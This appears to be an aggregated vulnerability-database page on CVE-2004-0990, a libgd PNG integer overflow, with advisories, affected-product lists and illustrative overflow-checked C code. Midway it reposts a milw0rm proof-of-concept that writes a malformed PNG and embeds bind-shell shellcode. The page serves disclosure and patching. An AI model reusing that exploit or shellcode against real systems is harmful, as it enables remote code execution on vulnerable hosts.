CVE-2004-0990
CVSS 10.0
Published: 2005-03-01 00:00:00
Last modified: 2016-10-17 22:50:31

[Original] Integer overflow in GD Graphics Library libgd 2.0.28 (libgd2), and possibly other versions, allows remote attackers to cause a denial of service and possibly execute arbitrary code via PNG image files with large image rows values that lead to a heap-based buffer overflow in the gdImageCreateFromPngCtx function, a different set of vulnerabilities than CVE-2004-0941.


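[CNNVD] GD 'gd_png.c' Integer Overflow Vulnerability (CNNVD-200503-024)

        GD is a graphics library for creating images dynamically.
        GD has an integer overflow in the memory allocation it performs when loading PNG image files. A remote attacker may be able to exploit this to execute arbitrary code with the privileges of the process.
        The flaw is in the gdImageCreateFromPngCtx() function in gd_png.c, which is called by gdImageCreateFromPng() and loads an image file into GD's data structures. When memory is allocated for the image, the input parameters are not sufficiently checked, which can cause an integer overflow. A crafted PNG image that a user is induced to open may lead to arbitrary code execution with the privileges of the process.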
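The wraparound described above, shown with the header values used by the proof-of-concept further down this page (width 0x8000, height 0x10000, bit depth 16, colour type 4) next to an overflow-checked size calculation. This is an added illustration, not libgd's source: the function names, the 32-bit `rowbytes * height` sizing pattern and the 256 MiB cap are assumptions.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* Hypothetical policy cap on decoded image size (assumption, not a libgd value). */
#define IMAGE_BYTES_MAX ((size_t)256 * 1024 * 1024)

/* Samples per pixel for each PNG colour type; 0 marks an invalid type. */
static uint32_t png_channels(uint8_t color_type)
{
    switch (color_type) {
    case 0: return 1;   /* greyscale */
    case 2: return 3;   /* truecolour */
    case 3: return 1;   /* palette index */
    case 4: return 2;   /* greyscale + alpha */
    case 6: return 4;   /* truecolour + alpha */
    default: return 0;
    }
}

/* Unchecked pattern (assumed): every step is 32-bit, so the product is
 * reduced modulo 2^32 and the allocation can be far smaller than the
 * decoded image data that is later written into it. */
uint32_t image_bytes_unchecked(uint32_t width, uint32_t height,
                               uint8_t bit_depth, uint8_t color_type)
{
    uint32_t rowbytes = (width * png_channels(color_type) * bit_depth + 7) / 8;
    return rowbytes * height;
}

/* Checked form: validate the header fields, compute the row size in 64 bits,
 * and test the multiplication by division before performing it.
 * Returns the byte count, or 0 if the header must be rejected. */
size_t image_bytes_checked(uint32_t width, uint32_t height,
                           uint8_t bit_depth, uint8_t color_type)
{
    uint64_t channels = png_channels(color_type);
    uint64_t rowbytes;

    if (channels == 0 || width == 0 || height == 0)
        return 0;
    if (bit_depth != 1 && bit_depth != 2 && bit_depth != 4 &&
        bit_depth != 8 && bit_depth != 16)
        return 0;

    /* width < 2^32, channels <= 4, bit_depth <= 16: fits easily in 64 bits. */
    rowbytes = ((uint64_t)width * channels * bit_depth + 7) / 8;

    /* Equivalent to rowbytes * height <= IMAGE_BYTES_MAX, without overflowing. */
    if (rowbytes > IMAGE_BYTES_MAX / height)
        return 0;
    return (size_t)(rowbytes * height);
}

int main(void)
{
    /* Header values taken from the proof-of-concept on this page. */
    uint32_t w = 0x8000, h = 0x10000;

    printf("unchecked: %lu bytes\n",
           (unsigned long)image_bytes_unchecked(w, h, 16, 4));
    printf("checked:   %zu (0 = rejected)\n",
           image_bytes_checked(w, h, 16, 4));
    printf("640x480 RGBA8: %zu bytes\n",
           image_bytes_checked(640, 480, 8, 6));
    return 0;
}
```

The true size for those header values is 2^33 bytes, which truncates to 0 in 32 bits; the checked version rejects the header before any allocation is attempted.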

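- CVSS (base score)

CVSS score: 10 [Severe (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)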

cpe:/a:gd_graphics_library:gdlib:2.0.22
cpe:/o:trustix:secure_linux:1.5  Trustix Secure Linux 1.5
cpe:/a:gd_graphics_library:gdlib:1.8.4
cpe:/a:gd_graphics_library:gdlib:2.0.20
cpe:/a:gd_graphics_library:gdlib:2.0.23
cpe:/a:gd_graphics_library:gdlib:2.0.26
cpe:/a:gd_graphics_library:gdlib:2.0.21
cpe:/o:suse:suse_linux:9.0::x86_64
cpe:/o:trustix:secure_linux:2.2  Trustix Secure Linux 2.2
cpe:/a:openpkg:openpkg:current
cpe:/o:trustix:secure_linux:2.1  Trustix Secure Linux 2.1
cpe:/o:trustix:secure_linux:2.0  Trustix Secure Linux 2.0
cpe:/a:gd_graphics_library:gdlib:2.0.27
cpe:/a:gd_graphics_library:gdlib:2.0.1
cpe:/o:gentoo:linux  Gentoo Linux
cpe:/a:openpkg:openpkg:2.2  OpenPKG 2.2
cpe:/a:gd_graphics_library:gdlib:2.0.15
cpe:/a:openpkg:openpkg:2.1  OpenPKG 2.1
cpe:/o:suse:suse_linux:8.1  SuSE SuSE Linux 8.1
cpe:/o:suse:suse_linux:9.0  SuSE SuSE Linux 9.0
cpe:/o:suse:suse_linux:8.0  SuSE SuSE Linux 8.0
cpe:/a:gd_graphics_library:gdlib:2.0.28
cpe:/o:suse:suse_linux:9.2  SuSE SuSE Linux 9.2
cpe:/o:suse:suse_linux:8.2  SuSE SuSE Linux 8.2
cpe:/o:suse:suse_linux:9.1  SuSE SuSE Linux 9.1

- OVAL (technical details for detection)

oval:org.mitre.oval:def:9952  Integer overflow in GD Graphics Library libgd 2.0.28 (libgd2), and possibly other versions, allows remote attackers to cause a denial of ser...
oval:org.mitre.oval:def:1260  Integer Overflow in libgd2
*OVAL describes in detail how to detect this vulnerability; further technical details on detecting it can be found in the related OVAL definitions.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0990
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0990
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200503-024
(Official data source) CNNVD

- Other links and resources

http://lists.suse.com/archive/suse-security-announce/2006-Feb/0001.html
(UNKNOWN)  SUSE  SUSE-SR:2006:003
http://marc.info/?l=bugtraq&m=109882489302099&w=2
(UNKNOWN)  BUGTRAQ  20041026 libgd integer overflow
http://marc.info/?l=bugtraq&m=109907605501428&w=2
(UNKNOWN)  UBUNTU  USN-11-1
http://marc.info/?l=bugtraq&m=110055781015402&w=2
(UNKNOWN)  UBUNTU  USN-25-1
http://www.ciac.org/ciac/bulletins/p-071.shtml
(UNKNOWN)  CIAC  P-071
http://www.debian.org/security/2004/dsa-589
(UNKNOWN)  DEBIAN  DSA-589
http://www.debian.org/security/2004/dsa-591
(UNKNOWN)  DEBIAN  DSA-591
http://www.debian.org/security/2004/dsa-601
(UNKNOWN)  DEBIAN  DSA-601
http://www.debian.org/security/2004/dsa-602
(UNKNOWN)  DEBIAN  DSA-602
http://www.mandriva.com/security/advisories?name=MDKSA-2004:132
(UNKNOWN)  MANDRAKE  MDKSA-2004:132
http://www.mandriva.com/security/advisories?name=MDKSA-2006:113
(UNKNOWN)  MANDRIVA  MDKSA-2006:113
http://www.mandriva.com/security/advisories?name=MDKSA-2006:114
(UNKNOWN)  MANDRIVA  MDKSA-2006:114
http://www.mandriva.com/security/advisories?name=MDKSA-2006:122
(UNKNOWN)  MANDRIVA  MDKSA-2006:122
http://www.redhat.com/support/errata/RHSA-2004-638.html
(UNKNOWN)  REDHAT  RHSA-2004:638
http://www.securityfocus.com/bid/11523
(VENDOR_ADVISORY)  BID  11523
http://www.trustix.org/errata/2004/0058
(UNKNOWN)  TRUSTIX  2004-0058
http://xforce.iss.net/xforce/xfdb/17866
(VENDOR_ADVISORY)  XF  gd-png-bo(17866)
https://issues.rpath.com/browse/RPL-939
(UNKNOWN)  CONFIRM  https://issues.rpath.com/browse/RPL-939

- Vulnerability information

GD 'gd_png.c' Integer Overflow Vulnerability
Critical  Buffer overflow
2005-03-01 00:00:00 2005-10-28 00:00:00
Remote, local

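- Advisories and patches

        The vendor has not yet provided a patch or upgrade. Users of this software are advised to watch the vendor's home page for the latest version: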
        http://www.boutell.com/gd/

- Vulnerability information (600)

GD Graphics Library Heap Overflow Proof of Concept Exploit (EDBID:600)
linux local
2004-10-26 Verified
0 n/a
N/A
#include <stdio.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <fcntl.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdint.h>
#include <zlib.h>

#define OUTFILE "britnay_spares_pr0n.png"
#define BS 0x1000
#define ALIGN 0

#define die(x) do{ perror((x)); exit(EXIT_FAILURE);}while(0)

/*
 * a chunk looks like:
 * [ 4 byte len ]   - just the length of data
 * [ 4 byte id  ]   - identifies chunk data type
 * [ 0+ data    ]   - 
 * [ 4 byte crc ]   - covers the id and data
 */

/* identifies a file as a png */
#define MAJIC_LEN sizeof(png_majic)
u_char png_majic[] = { 0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a };

/* png id fields */
#define ID_LEN sizeof(png_ihdr_id)
u_char png_ihdr_id[] = { 73, 72, 68, 82 };
u_char png_idat_id[] = { 73, 68, 65, 84 };
u_char png_iend_id[] = { 73, 69, 78, 68 };


/*
 * the iHDR chunk.  image information.
 */
#define IHDR_LEN sizeof(png_ihdr)
struct _png_ihdr {
    uint32_t    len,
                id,
                width,
                height;
    uint8_t     bit_depth,
                color_type,
                compress_meth,
                filter_meth,
                interlace_meth;
    uint32_t    crc;
} __attribute__((packed));
typedef struct _png_ihdr png_ihdr;


/*
 * the iDAT chunk. the compressed data of image.
 */
#define IDAT_LEN sizeof(png_idat)
#define IDAT_DATA_SZ 512
struct _png_idat {
    uint32_t    len,
                id;
    u_char      data[IDAT_DATA_SZ];
    uint32_t    crc;
} __attribute__((packed));
typedef struct _png_idat png_idat;


/*
 * the iEND chunk. contains no data.
 */
#define IEND_LEN sizeof(png_iend)
struct _png_iend {
    uint32_t    len,
                id,
                crc;
} __attribute__((packed));
typedef struct _png_iend png_iend;


/* call them shell code */
#define SHELL_LEN strlen(sc)
char sc[] =
    "\x31\xc0\x50\x50\x66\xc7\x44\x24\x02\x1b\x58\xc6\x04\x24\x02\x89\xe6"
    "\xb0\x02\xcd\x80\x85\xc0\x74\x08\x31\xc0\x31\xdb\xb0\x01\xcd\x80\x50"
    "\x6a\x01\x6a\x02\x89\xe1\x31\xdb\xb0\x66\xb3\x01\xcd\x80\x89\xc5\x6a"
    "\x10\x56\x50\x89\xe1\xb0\x66\xb3\x02\xcd\x80\x6a\x01\x55\x89\xe1\x31"
    "\xc0\x31\xdb\xb0\x66\xb3\x04\xcd\x80\x31\xc0\x50\x50\x55\x89\xe1\xb0"
    "\x66\xb3\x05\xcd\x80\x89\xc5\x31\xc0\x89\xeb\x31\xc9\xb0\x3f\xcd\x80"
    "\x41\x80\xf9\x03\x7c\xf6\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62"
    "\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";



int main(int argc, char **argv)
{
    int fd = 0, len = 0;
    char    *filename = OUTFILE;
    u_char  buf[BS] = { 0, };
    u_long  retaddr = 0;
    png_ihdr    ihdr;
    png_idat    idat;
    png_iend    iend;

#if 0
    if(argc < 2){
        fprintf(stderr, "Usage: %s < retaddr > [ outfile ]\n", argv[0]);
        return EXIT_FAILURE;
    }
    if(argc > 2)
        filename = argv[2];
    sscanf(argv[1], "%lx", &retaddr);
#endif

#define PNG_USER_WIDTH_MAX 1000000L /* 0xf4240 */
    /*
     * setup png headers
     */
    size_t  a,b;
    ihdr.len = htonl(0xd);
    memcpy(&ihdr.id, png_ihdr_id, ID_LEN);
    /*
     * need to play with width and height, and also with color_type. depending
     * on color_type value, rowbytes can be manipulated
     */
    a = ihdr.width = htonl(0x8000);
    b = ihdr.height = htonl(0x10000);
    ihdr.bit_depth = 16;
    ihdr.color_type = 4;
    ihdr.compress_meth = 0x0;
    ihdr.filter_meth = 0x0;
    ihdr.interlace_meth = 0x0;
    ihdr.crc = htonl(crc32(0, (u_char *)&ihdr.id, 17));

    iend.len = 0x0;
    memcpy(&iend.id, png_iend_id, ID_LEN);
    iend.crc = htonl(crc32(0, (u_char *)&iend.id, 4));

    idat.len = htonl(IDAT_DATA_SZ);
    memcpy(&idat.id, png_idat_id, ID_LEN);
    memset(idat.data, 'A', IDAT_DATA_SZ);
    idat.crc = htonl(crc32(0, (u_char *)&idat.id, IDAT_DATA_SZ+4));
    
    /* 
     * create buffer:
     * png id - png ihdr - png idat - png iend
     */
    memcpy(buf, png_majic, MAJIC_LEN);
    len += MAJIC_LEN;
    memcpy(buf+len, &ihdr, IHDR_LEN);
    len += IHDR_LEN;
    memcpy(buf+len, &idat, IDAT_LEN);
    len += IDAT_LEN;
    memcpy(buf+len, &iend, IEND_LEN);
    len += IEND_LEN;

    /* create the file */
    if( (fd = open(filename, O_WRONLY|O_CREAT, 0666)) < 0)
        die("open");
    if(write(fd, buf, len) != len)
        die("write");
    close(fd);
    
    return 0;
}

// milw0rm.com [2004-10-26]
		

- Vulnerability information (F35208)

dsa-602.txt (PacketStormID:F35208)
2004-12-11 00:00:00
 
advisory,overflow,arbitrary
linux,debian
CVE-2004-0941,CVE-2004-0990

Debian Security Advisory 602-1 - Wait.. No.. what is this? Even more potential integer overflows have been found in the GD graphics library which were not covered by security advisory DSA 589 and DSA 601. They could be exploited by a specially crafted graphic and could lead to the execution of arbitrary code on the victim's machine.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 602-1                     security@debian.org
http://www.debian.org/security/                             Martin Schulze
November 29th, 2004                     http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : libgd2
Vulnerability  : integer overflow
Problem-Type   : remote
Debian-specific: no
CVE ID         : CAN-2004-0941 CAN-2004-0990

More potential integer overflows have been found in the GD graphics
library which weren't covered by our security advisory DSA 591.  They
could be exploited by a specially crafted graphic and could lead to
the execution of arbitrary code on the victim's machine.

For the stable distribution (woody) these problems have been fixed in
version 2.0.1-10woody2.

For the unstable distribution (sid) these problems will be fixed soon.

We recommend that you upgrade your libgd2 packages.


Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.0 alias woody
- --------------------------------

  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.5 (GNU/Linux)

iD8DBQFBq0b1W5ql+IAeqTIRAhlJAJ9otS96on/CoR8GqTbhcaiWE32YewCfWK+F
XP5DUA10O4828fwRWuRiF34=
=YsrM
-----END PGP SIGNATURE-----

    

- Vulnerability information (F35205)

dsa-601.txt (PacketStormID:F35205)
2004-12-11 00:00:00
 
advisory,overflow,arbitrary
linux,debian
CVE-2004-0941,CVE-2004-0990

Debian Security Advisory 601-1 - More potential integer overflows have been found in the GD graphics library which were not covered by security advisory DSA 589. They could be exploited by a specially crafted graphic and could lead to the execution of arbitrary code on the victim's machine.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 601-1                     security@debian.org
http://www.debian.org/security/                             Martin Schulze
November 29th, 2004                     http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : libgd1
Vulnerability  : integer overflow
Problem-Type   : remote
Debian-specific: no
CVE ID         : CAN-2004-0941 CAN-2004-0990

More potential integer overflows have been found in the GD graphics
library which weren't covered by our security advisory DSA 589.  They
could be exploited by a specially crafted graphic and could lead to
the execution of arbitrary code on the victim's machine.

For the stable distribution (woody) these problems have been fixed in
version 1.8.4-17.woody4.

For the unstable distribution (sid) these problems will be fixed soon.

We recommend that you upgrade your libgd1 packages.


Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.0 alias woody
- --------------------------------

  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.5 (GNU/Linux)

iD8DBQFBqzL8W5ql+IAeqTIRAt4iAJ4xVv0L/nmb9CQutRz2IbqWnN+95gCgnQqL
ZxBI7+gG94Vlvh9OQH60c9c=
=Y0PO
-----END PGP SIGNATURE-----

    

- Vulnerability information (F35080)

Trustix Secure Linux Security Advisory 2004.58 (PacketStormID:F35080)
2004-11-20 00:00:00
 
advisory
linux
CVE-2004-0941,CVE-2004-0990,CVE-2004-0882,CVE-2004-0930

Trustix Secure Linux Security Advisory #2004-0058 - Various security fixes have been released for gd, samba, sqlgrey, and sudo.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Trustix Secure Linux Security Advisory #2004-0058

Package name:      gd samba sqlgrey sudo
Summary:           Various security fixes
Date:              2004-11-15
Affected versions: Trustix Secure Linux 1.5
                   Trustix Secure Linux 2.0
                   Trustix Secure Linux 2.1
                   Trustix Secure Linux 2.2
                   Trustix Operating System - Enterprise Server 2

- --------------------------------------------------------------------------
Package description:
  gd:
  gd is a graphics library. It allows your code to quickly draw images
  complete with lines, arcs, text, multiple colors, cut and paste from
  other images, and flood fills, and write out the result as a PNG or
  JPEG file. This is particularly useful in World Wide Web applications,
  where PNG and JPEG are two of the formats accepted for inline images
  by most browsers.

  samba:
  Samba provides an SMB server which can be used to provide network
  services to SMB (sometimes called "Lan Manager") clients, including
  various versions of MS Windows, OS/2, and other Linux machines

  sqlgrey:
  SQLgrey is a Postfix grey-listing policy service with auto-white-listing
  written in Perl with SQL database as storage backend.

  sudo:
  Sudo (superuser do) allows a system administrator to give certain
  users (or groups of users) the ability to run some (or all) commands
  as root while logging all commands and arguments. Sudo operates on a
  per-command basis.  It is not a replacement for the shell.  Features
  include: the ability to restrict what commands a user may run on a
  per-host basis, copious logging of each command (providing a clear
  audit trail of who did what), a configurable timeout of the sudo
  command, and the ability to use the same configuration file (sudoers)
  on many different machines.


Problem description:

  gd:
  Several overflows have been found in gd.  This can be used to
  execute arbitrary code in programs using the gd library.

  The Common Vulnerabilities and Exposures project (cve.mitre.org) has
  assigned the name CAN-2004-0941 and CAN-2004-0990 to these issues.


  sqlgrey:
  Matt Linzbach made us aware that the maintainers of SQLgrey have issued
  a new release that fixes an SQL injection bug.


  samba:
  From the Samba advisory:
  Invalid bounds checking in reply to certain trans2 requests 
  could result in a buffer overrun in smbd.  In order to exploit 
  this defect, the attacker must be able to create files with very 
  specific Unicode filenames on the Samba share. 

  The Common Vulnerabilities and Exposures project (cve.mitre.org) has
  assigned the name CAN-2004-0882 to this issue.

  From the Samba advisory:
  A bug in the input validation routines used to match
  filename strings containing wildcard characters may allow
  a user to consume more than normal amounts of CPU cycles
  thus impacting the performance and response of the server.
  In some circumstances the server can become entirely
  unresponsive.

  The Common Vulnerabilities and Exposures project (cve.mitre.org) has
  assigned the name CAN-2004-0930 to this issue.


  sudo:
  Bash exported functions and the CDPATH variable are now stripped from 
  the environment passed to the program to be executed. 




Action:
  We recommend that all systems with this package installed be upgraded.
  Please note that if you do not need the functionality provided by this
  package, you may want to remove it from your system.


Location:
  All Trustix Secure Linux updates are available from
  <URI:http://http.trustix.org/pub/trustix/updates/>
  <URI:ftp://ftp.trustix.org/pub/trustix/updates/>


About Trustix Secure Linux:
  Trustix Secure Linux is a small Linux distribution for servers. With focus
  on security and stability, the system is painlessly kept safe and up to
  date from day one using swup, the automated software updater.


Automatic updates:
  Users of the SWUP tool can enjoy having updates automatically
  installed using 'swup --upgrade'.


Questions?
  Check out our mailing lists:
  <URI:http://www.trustix.org/support/>


Verification:
  This advisory along with all Trustix packages are signed with the
  TSL sign key.
  This key is available from:
  <URI:http://www.trustix.org/TSL-SIGN-KEY>

  The advisory itself is available from the errata pages at
  <URI:http://www.trustix.org/errata/trustix-1.5/>,
  <URI:http://www.trustix.org/errata/trustix-2.0/>,
  <URI:http://www.trustix.org/errata/trustix-2.1/> and
  <URI:http://www.trustix.org/errata/trustix-2.2/>
  or directly at
  <URI:http://www.trustix.org/errata/2004/0058/>


MD5sums of the packages:


Trustix Security Team



- Vulnerability Information

11190
GD Graphics Library PNG Handling gdImageCreateFromPngCtx() Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public Vendor Verified

- Vulnerability Description

A remote overflow exists in GD Graphics Library. GD Graphics Library fails to check for an integer overflow when allocating memory for PNG image files in the gd_png.c gdImageCreateFromPngCtx() function. Using a specially crafted PNG image file, an attacker can cause a heap overflow and as a result remotely execute arbitrary code, leading to a loss of integrity.
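The unchecked size computation described above, next to a checked form, as an added C example (not libgd's source and not taken from the advisories). The function names and sample dimensions are assumptions constructed for illustration, and the arithmetic is fixed to 32 bits so the wrap is reproducible on any host.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdlib.h>

/* Unchecked form: the byte count for the pixel buffer is the product of
 * two attacker-controlled header fields. In 32-bit arithmetic the product
 * wraps modulo 2^32, so the buffer can end up far smaller than the number
 * of bytes the decoder later writes row by row. */
static uint32_t unchecked_image_bytes(uint32_t rowbytes, uint32_t height)
{
    return rowbytes * height;
}

/* Checked form: stores the size and returns 0 only when the product fits
 * in 32 bits; returns -1 otherwise so the caller can reject the image. */
static int checked_image_bytes(uint32_t rowbytes, uint32_t height,
                               uint32_t *out)
{
    if (rowbytes == 0 || height == 0)
        return -1;                      /* degenerate image */
    if (rowbytes > UINT32_MAX / height)
        return -1;                      /* rowbytes * height would wrap */
    *out = rowbytes * height;
    return 0;
}

/* Hypothetical loader step: allocate the pixel buffer or refuse the file.
 * A NULL return must be treated as "reject this image" by the caller. */
static unsigned char *alloc_image(uint32_t rowbytes, uint32_t height)
{
    uint32_t nbytes;

    if (checked_image_bytes(rowbytes, height, &nbytes) != 0)
        return NULL;
    return malloc(nbytes);
}
```

The same division-before-multiplication test applies to any other allocation sized from header fields, such as an array of per-row pointers.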

- Timeline

2004-10-25 Unknown
2004-10-25 Unknown

- Solution

Upgrade to version 2.0.29 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Vulnerability Author

- Vulnerability Information

GD Graphics Library Remote Integer Overflow Vulnerability
Boundary Condition Error 11523
Yes Yes
2004-10-26 12:00:00 2007-03-21 10:44:00
Discovery of this issue is credited to Sean <infamous41md@hotpop.com>.

- Affected Software Versions

Ubuntu Ubuntu Linux 4.1 ppc
Ubuntu Ubuntu Linux 4.1 ia64
Ubuntu Ubuntu Linux 4.1 ia32
Turbolinux Turbolinux Server 10.0
Turbolinux Turbolinux Server 10.0.0 x64
Turbolinux Turbolinux Desktop 10.0
Turbolinux Turbolinux FUJI
Turbolinux Turbolinux 10 F...
Turbolinux Home
Turbolinux FUJI 0
Turbolinux Appliance Server 2.0
Trustix Secure Linux 2.2
Trustix Secure Linux 2.1
Trustix Secure Linux 2.0
Trustix Secure Linux 1.5
Trustix Secure Enterprise Linux 2.0
SuSE SUSE Linux Enterprise Server 8
+ Linux kernel 2.4.21
+ Linux kernel 2.4.19
SGI ProPack 3.0
SGI Advanced Linux Environment 3.0
S.u.S.E. SuSE Linux Standard Server 8.0
S.u.S.E. SuSE Linux School Server for i386
S.u.S.E. SUSE LINUX Retail Solution 8.0
S.u.S.E. SuSE Linux Openexchange Server 4.0
S.u.S.E. Open-Enterprise-Server 9.0
S.u.S.E. Novell Linux Desktop 9.0
S.u.S.E. Linux Professional 10.0 OSS
S.u.S.E. Linux Professional 9.3 x86_64
S.u.S.E. Linux Professional 9.3
S.u.S.E. Linux Professional 9.2 x86_64
S.u.S.E. Linux Professional 9.2
S.u.S.E. Linux Professional 9.1 x86_64
S.u.S.E. Linux Professional 9.1
S.u.S.E. Linux Professional 9.0 x86_64
S.u.S.E. Linux Professional 9.0
S.u.S.E. Linux Professional 8.2
S.u.S.E. Linux Personal 10.0 OSS
S.u.S.E. Linux Personal 9.3 x86_64
S.u.S.E. Linux Personal 9.3
S.u.S.E. Linux Personal 9.2 x86_64
S.u.S.E. Linux Personal 9.2
S.u.S.E. Linux Personal 9.1 x86_64
S.u.S.E. Linux Personal 9.1
S.u.S.E. Linux Personal 9.0 x86_64
S.u.S.E. Linux Personal 9.0
S.u.S.E. Linux Personal 8.2
S.u.S.E. Linux Enterprise Server 9
S.u.S.E. Linux Desktop 1.0
S.u.S.E. Linux 8.1
S.u.S.E. Linux 8.0
rPath rPath Linux 1
RedHat Enterprise Linux WS 3
RedHat Enterprise Linux WS 2.1
RedHat Enterprise Linux ES 3
RedHat Enterprise Linux ES 2.1
RedHat Desktop 3.0
RedHat Advanced Workstation for the Itanium Processor 2.1 IA64
Red Hat Enterprise Linux AS 3
Red Hat Enterprise Linux AS 2.1
OpenPKG OpenPKG 2.2
OpenPKG OpenPKG 2.1
OpenPKG OpenPKG Current
Mandriva Linux Mandrake 2006.0 x86_64
Mandriva Linux Mandrake 2006.0
Mandriva Linux Mandrake 10.2 x86_64
Mandriva Linux Mandrake 10.2
MandrakeSoft Multi Network Firewall 2.0
MandrakeSoft Corporate Server 3.0 x86_64
MandrakeSoft Corporate Server 3.0
Gentoo Linux
GD Graphics Library gdlib 2.0.28
GD Graphics Library gdlib 2.0.27
GD Graphics Library gdlib 2.0.26
GD Graphics Library gdlib 2.0.23
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
GD Graphics Library gdlib 2.0.22
GD Graphics Library gdlib 2.0.21
GD Graphics Library gdlib 2.0.20
GD Graphics Library gdlib 2.0.15
GD Graphics Library gdlib 2.0.1
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
GD Graphics Library gdlib 1.8.4
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
+ Red Hat Enterprise Linux AS 3
+ Red Hat Enterprise Linux AS 2.1 IA64
+ Red Hat Enterprise Linux AS 2.1
+ RedHat Advanced Workstation for the Itanium Processor 2.1 IA64
+ RedHat Advanced Workstation for the Itanium Processor 2.1
+ RedHat Desktop 3.0
+ RedHat Enterprise Linux ES 3
+ RedHat Enterprise Linux ES 2.1 IA64
+ RedHat Enterprise Linux ES 2.1
+ RedHat Enterprise Linux WS 3
+ RedHat Enterprise Linux WS 2.1 IA64
+ RedHat Enterprise Linux WS 2.1
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
Avaya S8710 R2.0.1
Avaya S8710 R2.0.0
Avaya S8700 R2.0.1
Avaya S8700 R2.0.0
Avaya S8500 R2.0.1
Avaya S8500 R2.0.0
Avaya S8300 R2.0.1
Avaya S8300 R2.0.0
Avaya Network Routing
Avaya Modular Messaging (MSS) 2.0
Avaya Modular Messaging (MSS) 1.1
Avaya Modular Messaging S3400
Avaya MN100
Avaya Intuity LX
Avaya Converged Communications Server 2.0

- Vulnerability Discussion

The GD Graphics Library (gdlib) is affected by an integer overflow that facilitates a heap overflow. This issue is due to the library's failure to do proper sanity checking on size values contained within image-format files.

An attacker may leverage this issue to manipulate process heap memory, potentially leading to code execution and compromise of the computer running the affected library.

- Exploit

Currently we are not aware of any exploits for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- Solution

Please see the referenced advisories for more information.

NOTE: Reportedly, the vendor has released a patch or upgrade dealing with this issue, but this is unconfirmed. Please contact the vendor for more information.


GD Graphics Library gdlib 1.8.4

GD Graphics Library gdlib 2.0.1

GD Graphics Library gdlib 2.0.15

GD Graphics Library gdlib 2.0.23

- References

 

 
